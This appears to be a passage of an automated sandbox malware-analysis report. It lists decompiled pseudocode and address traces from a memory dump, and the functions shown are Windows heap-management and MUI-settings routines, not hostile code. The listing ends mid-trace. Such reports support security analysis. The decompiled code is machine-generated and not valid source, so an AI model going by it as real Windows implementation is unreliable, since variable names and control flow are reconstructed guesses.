                                                                            0x01132ff0
                                                                            0x01132ff5
                                                                            0x0113300e
                                                                            0x0113300f
                                                                            0x0113301a
                                                                            0x00000000
                                                                            0x01132f29
                                                                            0x01132f29
                                                                            0x01132f2c
                                                                            0x01132f4b
                                                                            0x01132f50
                                                                            0x01132f2e
                                                                            0x01132f43
                                                                            0x01132f48
                                                                            0x01132f56
                                                                            0x01132f64
                                                                            0x01132f6c
                                                                            0x01132f6c
                                                                            0x01132f72
                                                                            0x01132f76
                                                                            0x01132f7c
                                                                            0x01132f83
                                                                            0x01132f89
                                                                            0x01132f8a
                                                                            0x01132f8a
                                                                            0x00000000
                                                                            0x01132f76
                                                                            0x01132f27
                                                                            0x01132e6d
                                                                            0x01132da6
                                                                            0x01132dab
                                                                            0x01132db3
                                                                            0x01132db9
                                                                            0x011330bc
                                                                            0x011330c1
                                                                            0x011330c1

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                            • API String ID: 0-1745908468
                                                                            • Opcode ID: 325c738028b9513a6aa5440115bf36e7410acf6803add03abac3239a8b7fede3
                                                                            • Instruction ID: f3015f097a358881c63c7f2146433721b67911e3a939370cd083a52b932bc97f
                                                                            • Opcode Fuzzy Hash: 325c738028b9513a6aa5440115bf36e7410acf6803add03abac3239a8b7fede3
                                                                            • Instruction Fuzzy Hash: DB913430910641DFDB2AEFA8D450AADFBF2FF89700F18802CE495AB255C7329882CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01083D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E01083D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01081B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01081B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01081B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01081B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01081B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01094620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E010BF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E010C1370(_t276, 0x1054e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E010BBB40(0,  &_v68, _t170);
									if(L010843C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E010BBB40(_t257,  &_v68, _t243);
								if(L010843C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E010C1370(_t278, 0x1054e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01094620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E010BF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E010C1370(_v16, 0x1054e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E010BBB40(_t262,  &_v68, _t244);
								if(L010843C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E010C1370(_t282, 0x1054e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E010BBB40(_t262,  &_v68, _t201);
							if(L010843C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01094620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E010BF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E010C1370(_t280, 0x1054e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E010BBB40(_t267,  &_v68, _t245);
							if(L010843C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E010C1370(_t284, 0x1054e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E010BBB40(_t267,  &_v68, _t224);
						if(L010843C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                            0x01083d3c
                                                                            0x01083d42
                                                                            0x01083d44
                                                                            0x01083d46
                                                                            0x01083d49
                                                                            0x01083d4c
                                                                            0x01083d4f
                                                                            0x01083d52
                                                                            0x01083d55
                                                                            0x01083d58
                                                                            0x01083d5b
                                                                            0x01083d5f
                                                                            0x01083d61
                                                                            0x01083d66
                                                                            0x010d8213
                                                                            0x010d8218
                                                                            0x01084085
                                                                            0x01084088
                                                                            0x0108408e
                                                                            0x01084094
                                                                            0x0108409a
                                                                            0x010840a0
                                                                            0x010840a6
                                                                            0x010840a9
                                                                            0x010840af
                                                                            0x010840b6
                                                                            0x010840bd
                                                                            0x010840bd
                                                                            0x01083d83
                                                                            0x010d821f
                                                                            0x010d8229
                                                                            0x010d8238
                                                                            0x010d8238
                                                                            0x010d823d
                                                                            0x010d823d
                                                                            0x01083da0
                                                                            0x01083daf
                                                                            0x01083db5
                                                                            0x01083dba
                                                                            0x01083dba
                                                                            0x01083dd4
                                                                            0x01083e94
                                                                            0x01083eab
                                                                            0x01083f6d
                                                                            0x01083f84
                                                                            0x0108406b
                                                                            0x0108406b
                                                                            0x0108406e
                                                                            0x0108406e
                                                                            0x01084070
                                                                            0x01084074
                                                                            0x010d8351
                                                                            0x010d8351
                                                                            0x0108407a
                                                                            0x0108407f
                                                                            0x010d835d
                                                                            0x010d8370
                                                                            0x010d8377
                                                                            0x010d8379
                                                                            0x010d837c
                                                                            0x010d837c
                                                                            0x010d835d
                                                                            0x00000000
                                                                            0x0108407f
                                                                            0x01083f8a
                                                                            0x01083f8d
                                                                            0x01083f90
                                                                            0x01083f95
                                                                            0x010d830d
                                                                            0x010d830f
                                                                            0x01083f9b
                                                                            0x01083fac
                                                                            0x01083fae
                                                                            0x01083fb1
                                                                            0x01083fb1
                                                                            0x01083fb6
                                                                            0x010d8317
                                                                            0x010d831a
                                                                            0x00000000
                                                                            0x01083fbc
                                                                            0x01083fc1
                                                                            0x01083fc9
                                                                            0x01083fd7
                                                                            0x01083fda
                                                                            0x01083fdd
                                                                            0x01084021
                                                                            0x01084021
                                                                            0x01084029
                                                                            0x01084030
                                                                            0x01084044
                                                                            0x01084046
                                                                            0x01084046
                                                                            0x01084044
                                                                            0x01084049
                                                                            0x010d8327
                                                                            0x010d8334
                                                                            0x010d8339
                                                                            0x010d833c
                                                                            0x0108404f
                                                                            0x0108404f
                                                                            0x0108404f
                                                                            0x01084051
                                                                            0x01084056
                                                                            0x01084063
                                                                            0x01084063
                                                                            0x01084068
                                                                            0x00000000
                                                                            0x01084068
                                                                            0x01083fdf
                                                                            0x01083fe2
                                                                            0x01083fe4
                                                                            0x01083fe7
                                                                            0x01083fef
                                                                            0x01084003
                                                                            0x01084005
                                                                            0x01084005
                                                                            0x0108400c
                                                                            0x01084013
                                                                            0x01084016
                                                                            0x01084017
                                                                            0x0108401b
                                                                            0x0108401e
                                                                            0x00000000
                                                                            0x0108401e
                                                                            0x01083fb6
                                                                            0x01083eb1
                                                                            0x01083eb4
                                                                            0x01083eb7
                                                                            0x01083ebc
                                                                            0x010d82a9
                                                                            0x010d82ab
                                                                            0x01083ec2
                                                                            0x01083ed3
                                                                            0x01083ed5
                                                                            0x01083ed8
                                                                            0x01083ed8
                                                                            0x01083edd
                                                                            0x010d82b3
                                                                            0x010d82b6
                                                                            0x00000000
                                                                            0x01083ee3
                                                                            0x01083ee8
                                                                            0x01083eed
                                                                            0x01083ef0
                                                                            0x01083ef3
                                                                            0x01083f02
                                                                            0x01083f05
                                                                            0x01083f08
                                                                            0x010d82c0
                                                                            0x010d82c3
                                                                            0x010d82c5
                                                                            0x010d82c8
                                                                            0x010d82d0
                                                                            0x010d82e4
                                                                            0x010d82e6
                                                                            0x010d82e6
                                                                            0x010d82ed
                                                                            0x010d82f4
                                                                            0x010d82f7
                                                                            0x010d82f8
                                                                            0x010d82fc
                                                                            0x010d82ff
                                                                            0x010d82ff
                                                                            0x01083f0e
                                                                            0x01083f11
                                                                            0x01083f16
                                                                            0x01083f1d
                                                                            0x01083f31
                                                                            0x010d8307
                                                                            0x010d8307
                                                                            0x01083f31
                                                                            0x01083f39
                                                                            0x01083f48
                                                                            0x01083f4d
                                                                            0x01083f50
                                                                            0x01083f50
                                                                            0x01083f53
                                                                            0x01083f58
                                                                            0x01083f65
                                                                            0x01083f65
                                                                            0x01083f6a
                                                                            0x00000000
                                                                            0x01083f6a
                                                                            0x01083edd
                                                                            0x01083dda
                                                                            0x01083ddd
                                                                            0x01083de0
                                                                            0x01083de5
                                                                            0x010d8245
                                                                            0x01083deb
                                                                            0x01083df7
                                                                            0x01083dfc
                                                                            0x01083dfe
                                                                            0x01083e01
                                                                            0x01083e01
                                                                            0x01083e06
                                                                            0x010d824d
                                                                            0x010d824f
                                                                            0x010d8254
                                                                            0x00000000
                                                                            0x01083e0c
                                                                            0x01083e11
                                                                            0x01083e16
                                                                            0x01083e19
                                                                            0x01083e29
                                                                            0x01083e2c
                                                                            0x01083e2f
                                                                            0x010d825c
                                                                            0x010d825f
                                                                            0x010d8261
                                                                            0x010d8264
                                                                            0x010d826c
                                                                            0x010d8280
                                                                            0x010d8282
                                                                            0x010d8282
                                                                            0x010d8289
                                                                            0x010d8290
                                                                            0x010d8293
                                                                            0x010d8294
                                                                            0x010d8298
                                                                            0x010d829b
                                                                            0x010d829b
                                                                            0x01083e35
                                                                            0x01083e38
                                                                            0x01083e3d
                                                                            0x01083e44
                                                                            0x01083e58
                                                                            0x010d82a3
                                                                            0x010d82a3
                                                                            0x01083e58
                                                                            0x01083e60
                                                                            0x01083e6f
                                                                            0x01083e74
                                                                            0x01083e77
                                                                            0x01083e77
                                                                            0x01083e7a
                                                                            0x01083e7f
                                                                            0x01083e8c
                                                                            0x01083e8c
                                                                            0x01083e91
                                                                            0x00000000
                                                                            0x01083e91

                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 01083E97
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 01083DC0
                                                                            • Kernel-MUI-Language-SKU, xrefs: 01083F70
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 01083D8C
                                                                            • WindowsExcludedProcs, xrefs: 01083D6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 0-258546922
                                                                            • Opcode ID: 65e5b84c7fe870157ed907794135e9dbfe781ac1f2c99cec67041a3f906c1634
                                                                            • Instruction ID: 6e10e397a5254bcd2577a9120fb281be3db6334c1541557e6e222d46a2272880
                                                                            • Opcode Fuzzy Hash: 65e5b84c7fe870157ed907794135e9dbfe781ac1f2c99cec67041a3f906c1634
                                                                            • Instruction Fuzzy Hash: F1F15E72D04219EFCB11EF98C980AEEBBF9FF58650F14406AE985E7251E7749E01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010740E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 29%
                                                                            			E010740E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0107B150();
					} else {
						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0107B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0107B150(", passed to %s", _t29);
					}
					_push("\n");
					E0107B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1166378 = 1;
						asm("int3");
						 *0x1166378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                            0x010740e6
                                                                            0x010740e8
                                                                            0x010740f1
                                                                            0x010d042d
                                                                            0x010d044c
                                                                            0x010d0451
                                                                            0x010d042f
                                                                            0x010d0444
                                                                            0x010d0449
                                                                            0x010d045d
                                                                            0x010d0466
                                                                            0x010d046e
                                                                            0x010d0474
                                                                            0x010d0475
                                                                            0x010d047a
                                                                            0x010d048a
                                                                            0x010d048c
                                                                            0x010d0493
                                                                            0x010d0494
                                                                            0x010d0494
                                                                            0x00000000
                                                                            0x010d049b
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                            • API String ID: 0-188067316
                                                                            • Opcode ID: e98e79dcd88fa80285afa234fd6111b5070915d760e1323d5caaeda0f0341674
                                                                            • Instruction ID: c52cbc0f4bb33ab58db7c4602dc4726e5535d5caf7626b0fefaca611071c9d91
                                                                            • Opcode Fuzzy Hash: e98e79dcd88fa80285afa234fd6111b5070915d760e1323d5caaeda0f0341674
                                                                            • Instruction Fuzzy Hash: F0014732504341AEE3799769F40DFA7BBE4DF81B30F18806DF48D4B641DEA99480C669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0109A830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 70%
                                                                            			E0109A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1168748 - 1;
					if( *0x1168748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0107B150();
									_t260 = _t257 + 4;
								} else {
									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0107B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1167bc8;
								if(__eflags == 0) {
									E01132073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0113A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E010CD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0109AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0113A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0113A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1168748 - 1;
					if( *0x1168748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0107B150();
							} else {
								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0107B150();
							__eflags =  *0x1167bc8;
							if(__eflags == 0) {
								_t131 = E01132073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                            0x0109a83a
                                                                            0x0109a83c
                                                                            0x0109a83e
                                                                            0x0109a841
                                                                            0x0109a844
                                                                            0x0109a84a
                                                                            0x0109aa53
                                                                            0x0109aa59
                                                                            0x0109aa59
                                                                            0x0109a858
                                                                            0x0109a85e
                                                                            0x0109aaf5
                                                                            0x0109aafc
                                                                            0x010e229e
                                                                            0x010e22a2
                                                                            0x010e22a8
                                                                            0x010e22b3
                                                                            0x010e22b5
                                                                            0x010e22bb
                                                                            0x010e22c1
                                                                            0x010e22c5
                                                                            0x010e22e6
